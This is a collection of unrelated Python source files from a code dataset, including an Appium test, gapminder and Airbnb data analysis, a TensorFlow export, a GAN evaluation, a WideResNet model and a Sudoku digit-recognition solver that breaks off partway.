\"al\": 0.01,\n \"trpt\": 0.1,\n \"trpv\": 0.01,\n \"dmcoef\": 1e-09,\n \"extension\": 'dsp',\n \"multiDiff\": False,\n \"unitnumber\": None,\n \"filenames\": None\n }\n return default\n\n @staticmethod\n def read_package(package):\n content = {\n \"al\": package.al.array.tolist(),\n \"trpt\": np.reshape(package.trpt.array, (len(package.trpt.array),)).tolist(),\n \"trpv\": np.reshape(package.trpv.array, (len(package.trpv.array),)).tolist(),\n # \"dmcoef\": package.dmcoef.array.tolist(),\n \"extension\": package.extension[0],\n \"multiDiff\": package.multiDiff,\n \"unitnumber\": package.unit_number[0],\n # \"filenames\": package.filenames\n }\n return content\n","sub_path":"FlopyAdapter/MtPackages/DspAdapter.py","file_name":"DspAdapter.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"238091693","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/8/28 15:31\n# @Author : qiubin\n# @File : test_app.py\n# @Software: PyCharm\n\n\nfrom appium import 
webdriver\nimport time\ndesired_caps = {\n 'platformName': 'Android',\n # on a real device the deviceName value is not actually used, but the key must still be present, so any value will do\n 'deviceName': 'emulator-5554',\n 'platformVersion': '7.1.1',\n 'appPackage': 'com.tencent.mtt.x86',\n 'appActivity': 'com.tencent.mtt.x86.SplashActivity',\n 'noReset': True,\n 'unicodeKeyboard': True,\n 'resetKeyboard': True,\n 'chromeOptions': {'androidProcess': 'com.tencent.mm:appbrand0'},\n\n}\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\ntime.sleep(60)\ndriver.quit()\n","sub_path":"Day_001/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"272892625","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 1 09:55:54 2018\n\n@author: glen.alleman\n\"\"\"\n# saved as analysis.py\n\nimport pandas as pd\n\ndat_europe = pd.read_csv('data/gapminder_gdp_europe.csv', index_col='country')\n\n\ndat_oceania = pd.read_csv('data/gapminder_gdp_oceania.csv', index_col='country')\n\ndat_asia = pd.read_csv('data/gapminder_gdp_asia.csv', index_col='country')\n\n\n# working with asia data\n\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"466091402","text":"import numpy as np\n\nimport re\n\nstring = \"1010010101011110101001\" #\n\n\nclass node:\n a = 0 # inclusive\n b = 1 # exclusive\n pattern = \"\"\n symbol = \"\"\n repeats = 1\n children = []\n\n symbolType = False\n\n def __init__(self, from_, to_, p, c):\n self.a = from_\n self.b = to_\n self.pattern = p\n self.repeats = c\n self.children = []\n self.symbol = \"\"\n\n def add_child(self, node):\n self.children.append(node)\n\n def set_pattern(self, p):\n self.pattern = p\n\n def get_children(self):\n return self.children\n\n def get_num_children(self):\n return len(self.children)\n\n def print_children(self):\n for i in range(len(self.children)):\n print(self.children[i].pattern + \" \", end='')\n print()\n\n\ndef initialize_nodes(string):\n nodes = []\n for i in range(len(string)):\n nodes.append(node(i, i + 1, string[i:i + 1], 1))\n return [nodes, \"\"]\n\n\ndef get_repeating_pattern_type(node):\n # does a BFS, searching for the pattern which is repeated\n queue = node.get_children()\n while (queue):\n n = queue.pop(0)\n if (n.symbolType):\n return n\n children = n.get_children()\n for i in range(len(children)):\n queue.append(children[i])\n\n\ndef merge_nodes(nodes, mergeStart, mergeEnd, symb):\n pat = \"\"\n # print(\"merging from\"+ str(mergeStart) + \" to \"+ str(mergeEnd))\n n = node(nodes[mergeStart].a, nodes[mergeEnd].b, \"\", mergeEnd - mergeStart)\n # print(\"children1 \" + str(n.getNumChildren()))\n allSameType = True\n for i in range(mergeStart, mergeEnd + 1): # inclusive\n #\t\tif( pat != nodes[i].pattern):#\n #\t\t\tallSameType = False\n pat += nodes[i].pattern\n n.add_child(nodes[i])\n nodes[i].repeats = mergeEnd - mergeStart\n n.set_pattern(pat)\n #\tif(allSameType):\n #\t\tprint(\"all the same type! 
\\t \\t !!!\")\n #\tn.symbolType = allSameType\n\n n.symbol = symb\n # print(\"children2 \" + str(n.getNumChildren()))\n return n\n\n\ndef merge_t_codes(nodes, string):\n n = len(nodes)\n if (n == 1):\n return\n pat = nodes[-2].pattern\n k = 1\n i = 1\n while ((n - 2) - i >= 0):\n if (nodes[n - 2 - i].pattern == pat):\n k += 1\n else:\n break\n i += 1\n # now we have k, now begin merge from R to L\n newNodes = []\n merges = 0\n mergeStart = 0\n mergeEnd = 0\n merging = False\n ki = 0\n # print(n)\n for i in range(0, n):\n # print(\"i is \"+ str(i))\n if (nodes[i].pattern == pat):\n if (ki < k): # don't merge more than k at a time\n if (merging):\n mergeEnd += 1\n else:\n merging = True\n mergeStart = i\n mergeEnd = i + 1\n ki += 1\n else:\n newNodes.append(merge_nodes(nodes, mergeStart, mergeEnd, pat))\n ki = 0\n merging = False\n else:\n if (merging):\n newNodes.append(merge_nodes(nodes, mergeStart, mergeEnd, pat))\n else:\n n = node(nodes[i].a, nodes[i].b, nodes[i].pattern, nodes[i].repeats)\n n.symbol = pat\n for i in nodes[i].get_children():\n n.add_child(i)\n newNodes.append(n)\n merging = False\n ki = 0\n\n return [newNodes, pat]\n\n\ndef print_nodes(nodes):\n for i in range(len(nodes)):\n print(nodes[i].pattern + \" \", end='')\n print()\n\n\ndef print_t_code_pattern(tcodes, string):\n # does a BFS, searching for the pattern which is repeated\n print(\"printing T code pattern\")\n symbols = tcodes[1]\n queue = tcodes[0][0][0].get_children()\n TCodeComplexity = 0\n a = 1\n symbolIndex = 1\n #\tprint(symbols)\n symbol = symbols[-1 * symbolIndex]\n while (queue):\n if (symbolIndex > len(symbols)):\n print(\" + \" + string[-1:])\n return TCodeComplexity\n symbol = symbols[-1 * symbolIndex]\n a += 1\n n = queue.pop(0)\n if (n.pattern == symbol):\n print(\"(\" + n.pattern + \")\" + \"^\" + str(n.repeats) + \" \", end='')\n symbolIndex += 1\n TCodeComplexity += np.log2(1 + n.repeats)\n continue\n children = n.get_children()\n for i in range(len(children)):\n queue.append(children[i])\n return TCodeComplexity\n\n\ndef t_code_it_up(string):\n n = initialize_nodes(string)\n symbols = []\n print_nodes(n[0])\n while (len(n[0]) > 1):\n n = merge_t_codes(n[0], string)\n print_nodes(n[0])\n symbols.append(n[1])\n print(\"p =\" + str(n[1]))\n print()\n print(symbols)\n return [n, symbols]\n\n\n# n = [list of nodes, pattern] is list of nodes (list of 1 node, really)\n# symbols is list of patterns\n\nif __name__ == '__main__':\n #string = \"0100010101101\"\n string = \"01101101011101\"\n tcodes = t_code_it_up(string)\n\n complexity = print_t_code_pattern(tcodes, string)\n print(\"\\nTCode Complexity =\" + str(complexity))\n print(\"\\n\")\n","sub_path":"Tcode_code/old_TCode/TCodes_2.py","file_name":"TCodes_2.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"62572428","text":"'''\r\n导出模型\r\n'''\r\nimport tensorflow as tf\r\nweight = tf.Variable(2,dtype=\"float32\",name=\"weight\")\r\nbias = tf.Variable(1,dtype=\"float32\",name=\"bias\")\r\nx = tf.placeholder(tf.float32,name=\"x\")\r\ny = tf.add(tf.multiply(x, weight),bias,name=\"y\")\r\n\r\ninit = tf.initialize_all_variables()\r\n\r\nsaver = tf.train.Saver()\r\nwith tf.Session() as sess:\r\n sess.run(init)\r\n print(\"y:\",sess.run(y,feed_dict={x:5.0}))\r\n saver.save(sess, 
\"../data/model.ckpt\")","sub_path":"tensorflow/model/ExportModel.py","file_name":"ExportModel.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"508146058","text":"from edc.map.classes import site_mappers\nfrom edc.dashboard.search.classes import BaseSearcher\n\nfrom .base_search_by_mixin import BaseSearchByMixin\n\n\nclass BaseSearchByGps(BaseSearchByMixin, BaseSearcher):\n\n def __init__(self):\n super(BaseSearchByGps, self).__init__()\n self._mapper = None\n self.set_mapper()\n\n def set_mapper(self):\n mapper_cls = site_mappers.get_registry(self.get_current_community())\n self._mapper = mapper_cls()\n\n def get_mapper(self):\n \"\"\"Returns the mapper instance for this community.\"\"\"\n return self._mapper\n\n def contribute_to_context(self, context):\n context.update({'gps_search_form': self.get_search_form()})\n return context\n\n def get_search_queryset(self, request=None):\n \"\"\"Returns a filtered search model queryset.\"\"\"\n options = {self.get_mapper().map_area_field_attr: self.get_current_community()}\n if request:\n search_attrvalue = request.GET.get(self.get_search_attrname()) # e.g. identifier\n if search_attrvalue:\n options.update({self.get_search_attrname(): search_attrvalue})\n return self.get_search_model_cls().objects.filter(**{self.get_mapper().map_area_field_attr: self.get_current_community()})\n\n def get_items_ordered_by_distance(self, queryset, lat, lon, radius):\n \"\"\"Returns a dictionary of search items and a list of keys in order.\n\n The dictionary keys are the calculated distance from a given point.\n\n The queryset must be from a model that has the following attributes:\n * gps_target_lat\n * gps_target_lon\n * relative_distance\n \"\"\"\n ordered_list_of_keys = []\n items = {}\n for item in queryset:\n distance_from_gps = self.get_mapper().gps_distance_between_points(lat, lon, item.gps_target_lat, item.gps_target_lon, radius)\n if distance_from_gps <= radius:\n while distance_from_gps in ordered_list_of_keys:\n distance_from_gps += .0001 # slightly adjust so no two are the same\n ordered_list_of_keys.append(distance_from_gps)\n item.relative_distance = distance_from_gps\n items.update({distance_from_gps: item})\n ordered_list_of_keys.sort()\n return items, ordered_list_of_keys\n\n def get_search_result(self, request, **kwargs):\n \"\"\"Returns an iterable search_result ordered by distance from a given gps point.\"\"\"\n search_result = []\n gps_form = self.get_search_form(request.POST)\n if gps_form.is_valid():\n radius = gps_form.cleaned_data.get('radius') / 1000\n lat = self.get_mapper().get_gps_lat(gps_form.cleaned_data.get('degrees_s'), float('{0}'.format(gps_form.cleaned_data.get('minutes_s'))))\n lon = self.get_mapper().get_gps_lon(gps_form.cleaned_data.get('degrees_e'), float('{0}'.format(gps_form.cleaned_data.get('minutes_e'))))\n items_as_dct, ordered_list_of_keys = self.get_items_ordered_by_distance(self.get_search_queryset(), lat, lon, radius)\n for distance_from_gps in ordered_list_of_keys:\n search_result.append(items_as_dct[distance_from_gps])\n return search_result\n","sub_path":"apps/bcpp_household/search/base_search_by_gps.py","file_name":"base_search_by_gps.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"442711222","text":"import random\r\nimport time\r\nimport mrcfile\r\nimport warnings\r\nfrom PIL import Image\r\nfrom pg_model import 
*\r\nimport criterion\r\nimport math\r\nfrom skimage.measure import compare_ssim\r\nimport torch.optim as optim\r\nimport torch.backends.cudnn as cudnn\r\nimport torchvision.utils as vutils\r\n\r\nimport torch.utils.data as udata\r\nimport torchvision.datasets as vdatasets\r\nimport torchvision.transforms as transforms\r\nimport argparse\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ntest_noisy_data = mrcfile.open('./data/test_SNR0.05_Gaussian.mrc').data\r\ntest_clean_data = mrcfile.open('./data/test_clean.mrc').data\r\n\r\nresolution_ = 128\r\nlatent_size_ = 2\r\nrgb_channel_ = 1\r\nfmap_base_ = 2 ** 11\r\nfmap_decay_ = 1.0\r\nfmap_max_ = 2 ** 7\r\nis_tanh_ = True\r\nis_sigmoid_ = False\r\nbatch_size = 8\r\nimg_size = 128\r\ng_net = Generator(resolution_, latent_size_, rgb_channel_,\r\n fmap_base_, fmap_decay_, fmap_max_, is_tanh=is_tanh_).cuda()\r\nd_net = Discriminator(resolution_, rgb_channel_,\r\n fmap_base_, fmap_decay_, fmap_max_, is_sigmoid=is_sigmoid_).cuda()\r\ne_net = Encoder(resolution_, rgb_channel_,\r\n fmap_base_, fmap_decay_, fmap_max_, is_sigmoid=is_sigmoid_).cuda()\r\nnet_level = 5\r\nnet_status = \"stable\"\r\nnet_alpha = 1\r\ng_net.net_config = [net_level, net_status, net_alpha]\r\ne_net.net_config = [net_level, net_status, net_alpha]\r\nd_net.net_config = [net_level, net_status, net_alpha]\r\nprint(g_net.net_status_)\r\ng_net.load_state_dict(torch.load('/home/hguaf/MSML/PGGAN/WGANgp_l1/Gnet_128x128.pth'))\r\nd_net.load_state_dict(torch.load('/home/hguaf/MSML/PGGAN/WGANgp_l1/Dnet_128x128.pth'))\r\ne_net.load_state_dict(torch.load('/home/hguaf/MSML/PGGAN/WGANgp_l1/Enet_128x128.pth'))\r\n\r\nMSE = []\r\nPSNR = []\r\nssmi = []\r\nk = 0\r\nfor i in range(int(1500 / batch_size)):\r\n cond = test_noisy_data[i * batch_size: i * batch_size + batch_size, :, :]\r\n img = test_clean_data[i * batch_size: i * batch_size + batch_size, :, :]\r\n k = k + 1\r\n pcond2 = np.reshape(cond, (batch_size, 1, img_size, img_size))\r\n pcond2 = torch.from_numpy(pcond2).cuda()\r\n for t in range(batch_size):\r\n gen_img = g_net(e_net((pcond2)))[t].cpu().detach().numpy()\r\n gen_img = gen_img.reshape((img_size, img_size))\r\n # m = criterion.l1loss(gen_img, img[t])\r\n m = criterion.MSE(gen_img, img[t])\r\n ssmi.append(compare_ssim(gen_img, img[t]))\r\n MSE.append(m)\r\n PSNR.append(10 * math.log10(1 / m))\r\n\r\nplt.imshow(gen_img, cmap='gray')\r\nplt.savefig('1.png')\r\nplt.imshow(img[t], cmap='gray')\r\nplt.savefig('2.png')\r\nprint(np.mean(MSE))\r\nprint(np.mean(ssmi))\r\nprint(np.mean(PSNR))\r\n","sub_path":"pggan_test.py","file_name":"pggan_test.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"241922858","text":"import numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom sklearn.cluster import KMeans\n\ndf = pd.read_csv(r\"C:\\data\\ds\\Airbnb.csv\")\ndf.shape\ndf.head()\n\ncoordinates = df.loc[:,['longitude', 'latitude']]\ncoordinates.shape\n\nplt.scatter(df.loc[:,'longitude'], df.loc[:, 'latitude'])\n\nWCSS = []\n\nfor k in range(1,15):\n kmeans = KMeans(n_clusters=k)\n kmeans.fit(coordinates)\n WCSS.append(kmeans.inertia_)\n \nplt.plot(range(1,15),WCSS)\nplt.xlabel(\"Number of K-Value (Clusters)\")\nplt.ylabel(\"WCSS\")\nplt.grid()\nplt.show()\n\nkmeans = KMeans(n_clusters= 6, max_iter=300, random_state=1)\nclusters = kmeans.fit_predict(coordinates)\nlabels = kmeans.labels_\ncentroids = kmeans.cluster_centers_\n\nh = 0.001 ##dokladnosc\nx_min, x_max = 
coordinates['longitude'].min(), coordinates['longitude'].max()\ny_min, y_max = coordinates['latitude'].min(), coordinates['latitude'].max()\nxx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h)) \nZ = kmeans.predict(np.c_[xx.ravel(), yy.ravel()])\n\nplt.figure(1, figsize = (10,4))\nplt.clf()\nZ = Z.reshape(xx.shape)\nplt.imshow(Z, interpolation = 'nearest',\n extent=(xx.min(), xx.max(), yy.min(), yy.max()),\n cmap = plt.cm.Pastel2, origin = 'lower')\n\nplt.scatter(x = coordinates['longitude'], y = coordinates['latitude'],\n c = labels, s=100)\n\nplt.scatter(x=centroids[:,0], y=centroids[:,1],\n s=200, c='red')\n\nplt.ylabel('longitude(y)'), plt.xlabel('latitude(x)')\nplt.grid()\nplt.title(\"Ottawa Clustering\")\nplt.show()\n\n","sub_path":"Unsupervised learning - clustering.py","file_name":"Unsupervised learning - clustering.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"486087732","text":"import torch\n\nclass WideBasicBlock(torch.nn.Module):\n def __init__(self, inplanes, outplanes, dropout_rate=0.5, \n stride=1, downsample=None):\n super(WideBasicBlock, self).__init__()\n self.downsample = downsample\n\n self.relu = torch.nn.ReLU(inplace=True)\n\n self.bn1 = torch.nn.BatchNorm2d(inplanes)\n self.conv1 = torch.nn.Conv2d(inplanes, outplanes,\n kernel_size=3, padding=1, stride=1, bias=False)\n\n self.dropout = torch.nn.Dropout(p=dropout_rate)\n\n self.bn2 = torch.nn.BatchNorm2d(outplanes)\n self.conv2 = torch.nn.Conv2d(outplanes, outplanes,\n kernel_size=3, padding=1, stride=stride, bias=True)\n\n def forward(self, x):\n shortcut = x\n\n out = self.bn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n\n out = self.dropout(out)\n\n out = self.bn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n\n if self.downsample is not None:\n shortcut = self.downsample(x)\n out += shortcut\n \n return out\n \n\nclass WideResNet32(torch.nn.Module):\n def __init__(self, depth, widen_factor, dropout_rate, num_classes):\n super(WideResNet32, self).__init__()\n self.inplanes = 16\n\n assert ((depth-4)%6 == 0), 'WideResNet depth should be 6n+4'\n n = (depth - 4) // 6\n k = widen_factor\n\n print('WideResNet %dx%d' % (depth, k))\n nstages = [16, 16*k, 32*k, 64*k]\n\n self.conv1 = torch.nn.Conv2d(3, nstages[0], kernel_size=3, padding=1, \n stride=1, bias=True)\n self.layer1 = self._make_layer(\n WideBasicBlock, nstages[1], n, dropout_rate, stride=1)\n self.layer2 = self._make_layer(\n WideBasicBlock, nstages[2], n, dropout_rate, stride=2)\n self.layer3 = self._make_layer(\n WideBasicBlock, nstages[3], n, dropout_rate, stride=2)\n self.bn = torch.nn.BatchNorm2d(nstages[3], momentum=0.9)\n self.relu = torch.nn.ReLU(inplace=True)\n self.avgpool = torch.nn.AvgPool2d(8)\n self.fc = torch.nn.Linear(nstages[3], num_classes)\n \n def _make_layer(self, block, planes, blocks, dropout_rate, stride):\n strides = [stride] + [1]*(blocks-1)\n layers = []\n for stride in strides:\n downsample = None\n\n if stride != 1 or self.inplanes != planes:\n downsample = torch.nn.Sequential(\n torch.nn.Conv2d(self.inplanes, planes, \n kernel_size=1, stride=stride, bias=True)\n )\n\n layers.append(block(self.inplanes, planes, \n dropout_rate, stride, downsample))\n self.inplanes = planes\n\n return torch.nn.Sequential(*layers)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n\n out = self.bn(out)\n out = self.relu(out)\n out = 
self.avgpool(out)\n \n out = out.view(out.size(0), -1)\n out = self.fc(out)\n\n return out","sub_path":"dl/model/wide_resnet.py","file_name":"wide_resnet.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"567100420","text":"# Program uses CNN to recognise handwritten digits from a visual Soduku board\r\n# The digits are semi lexical hence some of them maybe recognized ambiguously\r\n# The conflict caused by ambiguity is resolved using a constraint rules written in Sudoku.py\r\n# The wrong examples are explained using euclidean distance from the pooling layer activations using DistanceUtility.py\r\n# @Author : Briti Gangopadhyay\r\n# @Institution : IIT Kharagpur\r\n\r\nfrom keras.models import model_from_json\r\nimport numpy as np\r\nimport cv2\r\nimport Sudoku as sd\r\nimport DistanceUtility as ds\r\nimport csv\r\nimport os\r\nimport sys\r\nimport copy\r\nimport random as rd\r\nfrom keras import Model\r\nfrom keras.datasets import mnist\r\nos.environ['KMP_WARNINGS'] = 'off'\r\n# For setting random numbers and getting the same result everytime\r\nrd.seed(32)\r\nargumentList = sys.argv\r\n\r\n# global variable suduko board\r\nboard = np.zeros((9, 9))\r\n# dictionary containing all the conflicting pairs\r\nconflict_pairs = {}\r\n# Dictionary to store the confidence of the numbers [(0,1) : {1:22,7:78}]\r\nsemilexicalcell_pred = {}\r\n# Maintaining a set of conflict tuples encountered\r\nconflict_set = set()\r\ncnn_pred_board = []\r\ninput_board = []\r\nmodel_refined = 0\r\ntrain_encoding = 0\r\n\r\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\r\nX_train = X_train.astype('float32')\r\nX_train /= 255\r\nX_train = X_train.reshape(X_train.shape[0], 28, 28, 1)\r\n\r\ndef load_model():\r\n\t# load json and create model\r\n\tjson_file = open('model_digit.json', 'r')\r\n\tloaded_model_json = json_file.read()\r\n\tjson_file.close()\r\n\tloaded_model = model_from_json(loaded_model_json)\r\n\t# load weights into new model\r\n\tloaded_model.load_weights(\"model_digit.h5\")\r\n\tprint(\"Loaded model from disk\")\r\n\treturn loaded_model\r\n\r\n# Create a new model from the trained model\r\n# This produces the output of the pooling layer\r\n\r\ndef create_max_pool_model(layer,model):\r\n model_refined = Model(inputs=model.inputs, outputs=model.layers[layer].output)\r\n train_encoding = model_refined.predict(X_train)\r\n return model_refined, train_encoding\r\n\r\n\r\ndef inference(model, img):\r\n\tpr = model.predict_classes(img.reshape(1, 28, 28, 1).astype('float32') / 255)\r\n\treturn pr\r\n\r\n\r\n# Deduce all the conflicting pairs once a conflict is found\r\ndef check_valid_board(board):\r\n\t# Check row values for all conflicts first\r\n\trow_num = 0\r\n\tcolumn_num = 0\r\n\tconflict_id = 1\r\n\t# Check for all the conflicting pairs in a row and there related conflicts\r\n\tfor row in board:\r\n\t\ti = 0\r\n\t\tconflict_stack = []\r\n\t\twhile i < len(row):\r\n\t\t\tj = i + 1\r\n\t\t\twhile j < len(row):\r\n\t\t\t\t# if there is a conflict in the row and that connflict cell has not been encountered previously\r\n\t\t\t\tif board[row_num][i] == board[row_num][j] and (row_num, i) not in conflict_set:\r\n\t\t\t\t\t# Add the first conflicting pairs in a stack\r\n\t\t\t\t\tconflict_stack.append((row_num, i))\r\n\t\t\t\t\tconflict_stack.append((row_num, j))\r\n\t\t\t\t\t# Check for other conflicts of the conflicting pair\r\n\t\t\t\t\t# Adding the conflict id in the map\r\n\t\t\t\t\tif conflict_id 
not in conflict_pairs.keys():\r\n\t\t\t\t\t\tconflict_pairs[conflict_id] = set()\r\n\t\t\t\t\t# check for conflict until the conflict stack is empty\r\n\t\t\t\t\twhile len(conflict_stack) != 0:\r\n\t\t\t\t\t\tele = conflict_stack.pop()\r\n\t\t\t\t\t\tconflict_pairs.get(conflict_id).add(ele)\r\n\t\t\t\t\t\tconflict_set.add(ele)\r\n\t\t\t\t\t\tele_row = ele[0]\r\n\t\t\t\t\t\tele_col = ele[1]\r\n\t\t\t\t\t\tk = 0\r\n\t\t\t\t\t\t# Check for other conflict cells in row and column\r\n\t\t\t\t\t\twhile k < len(row):\r\n\t\t\t\t\t\t\tif (board[ele_row][k] == board[ele_row][ele_col]) and (\r\n\t\t\t\t\t\t\t\t\t(ele_row, k) not in conflict_set) and (\r\n\t\t\t\t\t\t\t\t\tele_row, k) not in conflict_stack:\r\n\t\t\t\t\t\t\t\tconflict_stack.append((ele_row, k))\r\n\t\t\t\t\t\t\tif (board[k][ele_col] == board[ele_row][ele_col]) and (\r\n\t\t\t\t\t\t\t\t\t(k, ele_col) not in conflict_set) and (\r\n\t\t\t\t\t\t\t\t\tk, ele_col) not in conflict_stack:\r\n\t\t\t\t\t\t\t\tconflict_stack.append((k, ele_col))\r\n\t\t\t\t\t\t\tk = k + 1\r\n\t\t\t\t\tconflict_id = conflict_id + 1\r\n\t\t\t\tj = j + 1\r\n\t\t\ti = i + 1\r\n\t\trow_num = row_num + 1\r\n\r\n\t# Check for column conflict this only applies if the ambiguities are swapped in a row\r\n\tboard_transpose = board.T\r\n\tfor column in board_transpose:\r\n\t\ti = 0\r\n\t\twhile i < len(column):\r\n\t\t\tj = i + 1\r\n\t\t\twhile j < len(column):\r\n\t\t\t\tif board_transpose[column_num][i] == board_transpose[column_num][j] and (\r\n\t\t\t\t\t\ti, column_num) not in conflict_set:\r\n\t\t\t\t\t# Check for other conflicts of the conflicting pair\r\n\t\t\t\t\t# Adding the conflict id in the map\r\n\t\t\t\t\tif conflict_id not in conflict_pairs.keys():\r\n\t\t\t\t\t\tconflict_pairs[conflict_id] = set()\r\n\t\t\t\t\tconflict_pairs.get(conflict_id).add((i, column_num))\r\n\t\t\t\t\tconflict_pairs.get(conflict_id).add((j, column_num))\r\n\t\t\t\t\tconflict_set.add((i, column_num))\r\n\t\t\t\t\tconflict_set.add((j, column_num))\r\n\t\t\t\t\tconflict_id = conflict_id + 1\r\n\t\t\t\tj = j + 1\r\n\t\t\ti = i + 1\r\n\t\tcolumn_num = column_num + 1\r\n\r\n\tif len(conflict_pairs) == 0:\r\n\t\treturn True\r\n\treturn False\r\n\r\n\r\n# Function to remove ambiguities\r\n# And return the correct solution board\r\ndef create_correct_solution(board):\r\n\tkey = []\r\n\tfor conflict_id in conflict_pairs.keys():\r\n\t\tif conflict_id in key:\r\n\t\t\tcontinue\r\n\t\t# Case 1: unique row conflict\r\n\t\tif len(conflict_pairs.get(conflict_id)) == 3:\r\n\t\t\tset_number = {1, 2, 3, 4, 5, 6, 7, 8, 9}\r\n\t\t\tconflict_list = list(conflict_pairs.get(conflict_id))\r\n\t\t\tconflict_list.sort(key = lambda x: x[0])\r\n\t\t\tprint(conflict_list)\r\n\t\t\tif conflict_list[0][0] != conflict_list[1][0] and conflict_list[0][1] != conflict_list[1][1]:\r\n\t\t\t\tconflict_ele = conflict_list[2]\r\n\t\t\telif conflict_list[0][0] != conflict_list[2][0] and conflict_list[0][1] != conflict_list[2][1]:\r\n\t\t\t\tconflict_ele = conflict_list[1]\r\n\t\t\telse:\r\n\t\t\t\tconflict_ele = conflict_list[0]\r\n\t\t\tcol_num = conflict_ele[1]\r\n\t\t\tfor i in range(9):\r\n\t\t\t\ttry:\r\n\t\t\t\t\tset_number.remove(board[i][col_num])\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint('The key' + str(board[i][col_num]) + ' has already been removed')\r\n\t\t\tboard[conflict_ele[0]][conflict_ele[1]] = list(set_number)[0]\r\n\t\t\tkey.append(conflict_id)\r\n\t\t# Case 2: Conflict in only column when row items are swapped\r\n\t\telif len(conflict_pairs.get(conflict_id)) == 2:\r\n\t\t\tconflict_list = 
list(conflict_pairs.get(conflict_id))\r\n\t\t\tcolumn_of_conflict = conflict_list[0][1]\r\n\t\t\tset_number = {1, 2, 3, 4, 5, 6, 7, 8, 9}\r\n\t\t\tfor i in range(9):\r\n\t\t\t\ttry:\r\n\t\t\t\t\tset_number.remove(board[i][column_of_conflict])\r\n\t\t\t\texcept:\r\n\t\t\t\t\tpass\r\n\t\t\tconflict_tuples = None\r\n\t\t\t# Check which the common row between two tuple conflicts and if the number required is in the conflicted tuple\r\n\t\t\tfor k , v in conflict_pairs.items():\r\n\t\t\t\tif list(v) != conflict_list and len(v) == 2:\r\n\t\t\t\t\tv = list(v)\r\n\t\t\t\t\tif conflict_list[0][0] == v[0][0]:\r\n\t\t\t\t\t\tconflict_tuples = (v[0],conflict_list[0])\r\n\t\t\t\t\telif conflict_list[1][0] == v[0][0]:\r\n\t\t\t\t\t\tconflict_tuples = (v[0],conflict_list[1])\r\n\t\t\t\t\telif conflict_list[0][0] == v[1][0]:\r\n\t\t\t\t\t\tconflict_tuples = (v[1],conflict_list[0])\r\n\t\t\t\t\telif conflict_list[1][0] == v[1][0]:\r\n\t\t\t\t\t\tconflict_tuples = (v[1],conflict_list[1])\r\n\t\t\t\t\t# If one common row conflict tuple was found\r\n\t\t\t\t\tif conflict_tuples != None:\r\n\t\t\t\t\t\t# The conflict tuple has the missing number then swap the two pairs\r\n\t\t\t\t\t\tif board[conflict_tuples[0][0]][conflict_tuples[0][1]] == list(set_number)[0]:\r\n\t\t\t\t\t\t\tkey.append(k)\r\n\t\t\t\t\t\t\tkey.append(conflict_id)\r\n\t\t\t\t\t\t\ttemp = board[conflict_tuples[0][0]][conflict_tuples[0][1]]\r\n\t\t\t\t\t\t\tboard[conflict_tuples[0][0]][conflict_tuples[0][1]] = board[conflict_tuples[1][0]][conflict_tuples[1][1]]\r\n\t\t\t\t\t\t\tboard[conflict_tuples[1][0]][conflict_tuples[1][1]] = temp\r\n\t\t\t\t\t\t\tbreak\r\n\r\n\t\t# Case 3 : When there is cyclic dependency and the board needs to be solved\r\n\t\telse:\r\n\t\t\tconflict_list = list(conflict_pairs.get(conflict_id))\r\n\t\t\tkey.append(conflict_id)\r\n\t\t\tfor conflict_item in conflict_list:\r\n\t\t\t\tboard[conflict_item[0]][conflict_item[1]] = 0\r\n\t\t\tprint(np.array(board))\r\n\t\r\n\t# Make the positions 0 for every conflict that could not be resolved\r\n\tfor conflict_id in conflict_pairs.keys():\r\n\t\tif conflict_id in key:\r\n\t\t\tcontinue\r\n\t\telse:\r\n\t\t\tconflict_list = conflict_pairs.get(conflict_id)\r\n\t\t\tfor ele in conflict_list:\r\n\t\t\t\tboard[ele[0]][ele[1]] = 0\r\n\tboard = sd.call_solve_sudoku(np.asarray(board))\r\n\tif not board:\r\n\t\tprint(\"This board cannot be solved\")\r\n\t\treturn False\r\n\treturn board\r\n\r\n\r\nif __name__ == '__main__':\r\n\t'''#Part to fill up the board on the basis of global consistency\r\n\tmodel = load_model()\r\n\tmodel_refined, train_encoding = create_max_pool_model(5,model)\r\n\tpath = './SudokoPerfectSolution/'\r\n\twith open(str(path + 'configuration_' + str(argumentList[1]) +'.csv'), newline='') as csvfile:\r\n\t\tconf_reader = csv.reader(csvfile, delimiter=',', quotechar='|')\r\n\t\trow_count = 0\r\n\t\tfor row in conf_reader:\r\n\t\t\tcol_count = 0\r\n\t\t\tinput_board.append(row)\r\n\t\t\tfor x in row:\r\n\t\t\t\tnew_path = ''\r\n\t\t\t\tnew_path = path + x + 